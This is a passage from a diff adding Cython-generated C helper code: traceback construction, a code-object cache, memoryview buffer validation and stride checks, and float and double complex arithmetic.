*dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ + static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* CLineInTraceback */ + #ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ + #include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +#if PY_MAJOR_VERSION < 3 +static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags) { + __Pyx_TypeName obj_type_name; + if (PyObject_CheckBuffer(obj)) return PyObject_GetBuffer(obj, view, flags); + if (__Pyx_TypeCheck(obj, __pyx_array_type)) return __pyx_array_getbuffer(obj, view, flags); + if (__Pyx_TypeCheck(obj, __pyx_memoryview_type)) return __pyx_memoryview_getbuffer(obj, view, flags); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' does not have the buffer interface", + obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return -1; +} +static void __Pyx_ReleaseBuffer(Py_buffer *view) { + PyObject *obj = view->obj; + if (!obj) return; + if (PyObject_CheckBuffer(obj)) { + PyBuffer_Release(view); + return; + } + if ((0)) {} + view->obj = NULL; + Py_DECREF(obj); +} +#endif + + + /* MemviewSliceIsContig */ + static int +__pyx_memviewslice_is_contig(const __Pyx_memviewslice mvs, char order, int ndim) +{ + int i, index, step, start; + Py_ssize_t itemsize = mvs.memview->view.itemsize; + if (order == 'F') { + step = 1; + start = 0; + } else { + step = -1; + start = ndim - 1; + } + for (i = 0; i < ndim; i++) { + index = start + step * i; + if (mvs.suboffsets[index] >= 0 || mvs.strides[index] != itemsize) + return 0; + itemsize *= mvs.shape[index]; + } + return 1; +} + +/* OverlappingSlices */ + static void +__pyx_get_array_memory_extents(__Pyx_memviewslice *slice, + void **out_start, void **out_end, + int ndim, size_t itemsize) +{ + char *start, *end; + int i; + start = end = slice->data; + for (i = 0; i < ndim; i++) { + Py_ssize_t stride = slice->strides[i]; + Py_ssize_t extent = slice->shape[i]; + if (extent == 0) { + *out_start = *out_end = start; + return; + } else { + if (stride > 0) + end += stride * (extent - 1); + else + start += stride * (extent - 1); + } + } + *out_start = start; + *out_end = end + itemsize; +} +static int +__pyx_slices_overlap(__Pyx_memviewslice *slice1, + __Pyx_memviewslice *slice2, + int ndim, size_t itemsize) +{ + void *start1, *end1, *start2, *end2; + __pyx_get_array_memory_extents(slice1, &start1, &end1, ndim, itemsize); + __pyx_get_array_memory_extents(slice2, &start2, &end2, ndim, itemsize); + return (start1 < end2) && (start2 < end1); +} + +/* CIntFromPyVerify */ + #define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* TypeInfoCompare */ + static int +__pyx_typeinfo_cmp(__Pyx_TypeInfo *a, __Pyx_TypeInfo *b) +{ + int i; + if (!a || !b) + return 0; + if (a == b) + return 1; + if (a->size != b->size || a->typegroup != b->typegroup || + a->is_unsigned != b->is_unsigned || a->ndim != b->ndim) { + if (a->typegroup == 'H' || b->typegroup == 'H') { + return a->size == b->size; + } else { + return 0; + } + } + if (a->ndim) { + for (i = 0; i < a->ndim; i++) + if (a->arraysize[i] != b->arraysize[i]) + return 0; + } + if (a->typegroup == 'S') { + if (a->flags != b->flags) + return 0; + if (a->fields || b->fields) { + if (!(a->fields && b->fields)) + return 0; + for (i = 0; a->fields[i].type && b->fields[i].type; i++) { + __Pyx_StructField *field_a = a->fields + i; + __Pyx_StructField *field_b = b->fields + i; + if (field_a->offset != field_b->offset || + !__pyx_typeinfo_cmp(field_a->type, field_b->type)) + return 0; + } + return !a->fields[i].type && !b->fields[i].type; + } + } + return 1; +} + +/* MemviewSliceValidateAndInit */ + static int +__pyx_check_strides(Py_buffer *buf, int dim, int ndim, int spec) +{ + if (buf->shape[dim] <= 1) + return 1; + if (buf->strides) { + if (spec & __Pyx_MEMVIEW_CONTIG) { + if (spec & (__Pyx_MEMVIEW_PTR|__Pyx_MEMVIEW_FULL)) { + if (unlikely(buf->strides[dim] != sizeof(void *))) { + PyErr_Format(PyExc_ValueError, + "Buffer is not indirectly contiguous " + "in dimension %d.", dim); + goto fail; + } + } else if (unlikely(buf->strides[dim] != buf->itemsize)) { + PyErr_SetString(PyExc_ValueError, + "Buffer and memoryview are not contiguous " + "in the same dimension."); + goto fail; + } + } + if (spec & __Pyx_MEMVIEW_FOLLOW) { + Py_ssize_t stride = buf->strides[dim]; + if (stride < 0) + stride = -stride; + if (unlikely(stride < buf->itemsize)) { + PyErr_SetString(PyExc_ValueError, + "Buffer and memoryview are not contiguous " + "in the same dimension."); + goto fail; + } + } + } else { + if (unlikely(spec & __Pyx_MEMVIEW_CONTIG && dim != ndim - 1)) { + PyErr_Format(PyExc_ValueError, + "C-contiguous buffer is not contiguous in " + "dimension %d", dim); + goto fail; + } else if (unlikely(spec & (__Pyx_MEMVIEW_PTR))) { + PyErr_Format(PyExc_ValueError, + "C-contiguous buffer is not indirect in " + "dimension %d", dim); + goto fail; + } else if (unlikely(buf->suboffsets)) { + PyErr_SetString(PyExc_ValueError, + "Buffer exposes suboffsets but no strides"); + goto fail; + } + } + return 1; +fail: + return 0; +} +static int +__pyx_check_suboffsets(Py_buffer *buf, int dim, int ndim, int spec) +{ + CYTHON_UNUSED_VAR(ndim); + if (spec & __Pyx_MEMVIEW_DIRECT) { + if (unlikely(buf->suboffsets && buf->suboffsets[dim] >= 0)) { + PyErr_Format(PyExc_ValueError, + "Buffer not compatible with direct access " + "in dimension %d.", dim); + goto fail; + } + } + if (spec & __Pyx_MEMVIEW_PTR) { + if (unlikely(!buf->suboffsets || (buf->suboffsets[dim] < 0))) { + PyErr_Format(PyExc_ValueError, + "Buffer is not indirectly accessible " + "in dimension %d.", dim); + goto fail; + } + } + return 1; +fail: + return 0; +} +static int +__pyx_verify_contig(Py_buffer *buf, int ndim, int c_or_f_flag) +{ + int i; + if (c_or_f_flag & __Pyx_IS_F_CONTIG) { + Py_ssize_t stride = 1; + for (i = 0; i < ndim; i++) { + if (unlikely(stride * buf->itemsize != buf->strides[i] && buf->shape[i] > 1)) { + PyErr_SetString(PyExc_ValueError, + "Buffer not fortran contiguous."); + goto fail; + } + stride = stride * buf->shape[i]; + } + } else if (c_or_f_flag & __Pyx_IS_C_CONTIG) { + Py_ssize_t stride = 1; + for (i = ndim - 1; i >- 1; i--) { + if (unlikely(stride * buf->itemsize != buf->strides[i] && buf->shape[i] > 1)) { + PyErr_SetString(PyExc_ValueError, + "Buffer not C contiguous."); + goto fail; + } + stride = stride * buf->shape[i]; + } + } + return 1; +fail: + return 0; +} +static int __Pyx_ValidateAndInit_memviewslice( + int *axes_specs, + int c_or_f_flag, + int buf_flags, + int ndim, + __Pyx_TypeInfo *dtype, + __Pyx_BufFmt_StackElem stack[], + __Pyx_memviewslice *memviewslice, + PyObject *original_obj) +{ + struct __pyx_memoryview_obj *memview, *new_memview; + __Pyx_RefNannyDeclarations + Py_buffer *buf; + int i, spec = 0, retval = -1; + __Pyx_BufFmt_Context ctx; + int from_memoryview = __pyx_memoryview_check(original_obj); + __Pyx_RefNannySetupContext("ValidateAndInit_memviewslice", 0); + if (from_memoryview && __pyx_typeinfo_cmp(dtype, ((struct __pyx_memoryview_obj *) + original_obj)->typeinfo)) { + memview = (struct __pyx_memoryview_obj *) original_obj; + new_memview = NULL; + } else { + memview = (struct __pyx_memoryview_obj *) __pyx_memoryview_new( + original_obj, buf_flags, 0, dtype); + new_memview = memview; + if (unlikely(!memview)) + goto fail; + } + buf = &memview->view; + if (unlikely(buf->ndim != ndim)) { + PyErr_Format(PyExc_ValueError, + "Buffer has wrong number of dimensions (expected %d, got %d)", + ndim, buf->ndim); + goto fail; + } + if (new_memview) { + __Pyx_BufFmt_Init(&ctx, stack, dtype); + if (unlikely(!__Pyx_BufFmt_CheckString(&ctx, buf->format))) goto fail; + } + if (unlikely((unsigned) buf->itemsize != dtype->size)) { + PyErr_Format(PyExc_ValueError, + "Item size of buffer (%" CYTHON_FORMAT_SSIZE_T "u byte%s) " + "does not match size of '%s' (%" CYTHON_FORMAT_SSIZE_T "u byte%s)", + buf->itemsize, + (buf->itemsize > 1) ? "s" : "", + dtype->name, + dtype->size, + (dtype->size > 1) ? "s" : ""); + goto fail; + } + if (buf->len > 0) { + for (i = 0; i < ndim; i++) { + spec = axes_specs[i]; + if (unlikely(!__pyx_check_strides(buf, i, ndim, spec))) + goto fail; + if (unlikely(!__pyx_check_suboffsets(buf, i, ndim, spec))) + goto fail; + } + if (unlikely(buf->strides && !__pyx_verify_contig(buf, ndim, c_or_f_flag))) + goto fail; + } + if (unlikely(__Pyx_init_memviewslice(memview, ndim, memviewslice, + new_memview != NULL) == -1)) { + goto fail; + } + retval = 0; + goto no_fail; +fail: + Py_XDECREF(new_memview); + retval = -1; +no_fail: + __Pyx_RefNannyFinishContext(); + return retval; +} + +/* ObjectToMemviewSlice */ + static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dsds_double(PyObject *obj, int writable_flag) { + __Pyx_memviewslice result = { 0, 0, { 0 }, { 0 }, { 0 } }; + __Pyx_BufFmt_StackElem stack[1]; + int axes_specs[] = { (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_STRIDED), (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_STRIDED) }; + int retcode; + if (obj == Py_None) { + result.memview = (struct __pyx_memoryview_obj *) Py_None; + return result; + } + retcode = __Pyx_ValidateAndInit_memviewslice(axes_specs, 0, + PyBUF_RECORDS_RO | writable_flag, 2, + &__Pyx_TypeInfo_double, stack, + &result, obj); + if (unlikely(retcode == -1)) + goto __pyx_fail; + return result; +__pyx_fail: + result.memview = NULL; + result.data = NULL; + return result; +} + +/* MemviewDtypeToObject */ + static CYTHON_INLINE PyObject *__pyx_memview_get_double(const char *itemp) { + return (PyObject *) PyFloat_FromDouble(*(double *) itemp); +} +static CYTHON_INLINE int __pyx_memview_set_double(const char *itemp, PyObject *obj) { + double value = __pyx_PyFloat_AsDouble(obj); + if (unlikely((value == (double)-1) && PyErr_Occurred())) + return 0; + *(double *) itemp = value; + return 1; +} + +/* ObjectToMemviewSlice */ + static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_ds_double(PyObject *obj, int writable_flag) { + __Pyx_memviewslice result = { 0, 0, { 0 }, { 0 }, { 0 } }; + __Pyx_BufFmt_StackElem stack[1]; + int axes_specs[] = { (__Pyx_MEMVIEW_DIRECT | __Pyx_MEMVIEW_STRIDED) }; + int retcode; + if (obj == Py_None) { + result.memview = (struct __pyx_memoryview_obj *) Py_None; + return result; + } + retcode = __Pyx_ValidateAndInit_memviewslice(axes_specs, 0, + PyBUF_RECORDS_RO | writable_flag, 1, + &__Pyx_TypeInfo_double, stack, + &result, obj); + if (unlikely(retcode == -1)) + goto __pyx_fail; + return result; +__pyx_fail: + result.memview = NULL; + result.data = NULL; + return result; +} + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return ::std::complex< float >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + return x + y*(__pyx_t_float_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float x, float y) { + __pyx_t_float_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabsf(b.real) >= fabsf(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + float r = b.imag / b.real; + float s = (float)(1.0) / (b.real + b.imag * r); + return __pyx_t_float_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + float r = b.real / b.imag; + float s = (float)(1.0) / (b.imag + b.real * r); + return __pyx_t_float_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + if (b.imag == 0) { + return __pyx_t_float_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + float denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_float_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex a) { + __pyx_t_float_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrtf(z.real*z.real + z.imag*z.imag); + #else + return hypotf(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex a, __pyx_t_float_complex b) { + __pyx_t_float_complex z; + float r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + float denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_float(a, a); + case 3: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, a); + case 4: + z = __Pyx_c_prod_float(a, a); + return __Pyx_c_prod_float(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = powf(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2f(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_float(a); + theta = atan2f(a.imag, a.real); + } + lnr = logf(r); + z_r = expf(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cosf(z_theta); + z.imag = z_r * sinf(z_theta); + return z; + } + #endif +#endif + +/* Declarations */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return ::std::complex< double >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return x + y*(__pyx_t_double_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + __pyx_t_double_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabs(b.real) >= fabs(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + double r = b.imag / b.real; + double s = (double)(1.0) / (b.real + b.imag * r); + return __pyx_t_double_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + double r = b.real / b.imag; + double s = (double)(1.0) / (b.imag + b.real * r); + return __pyx_t_double_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + double denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_double_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrt(z.real*z.real + z.imag*z.imag); + #else + return hypot(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + double r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + double denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_double(a, a); + case 3: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, a); + case 4: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = pow(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_double(a); + theta = atan2(a.imag, a.real); + } + lnr = log(r); + z_r = exp(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cos(z_theta); + z.imag = z_r * sin(z_theta); + return z; + } + #endif +#endif + +/* MemviewSliceCopyTemplate */ + static __Pyx_memviewslice +__pyx_memoryview_copy_new_contig(const __Pyx_memviewslice *from_mvs, + const char *mode, int ndim, + size_t sizeof_dtype, int contig_flag, + int dtype_is_object) +{ + __Pyx_RefNannyDeclarations + int i; + __Pyx_memviewslice new_mvs = { 0, 0, { 0 }, { 0 }, { 0 } }; + struct __pyx_memoryview_obj *from_memview = from_mvs->memview; + Py_buffer *buf = &from_memview->view; + PyObject *shape_tuple = NULL; + PyObject *temp_int = NULL; + struct __pyx_array_obj *array_obj = NULL; + struct __pyx_memoryview_obj *memview_obj = NULL; + __Pyx_RefNannySetupContext("__pyx_memoryview_copy_new_contig", 0); + for (i = 0; i < ndim; i++) { + if 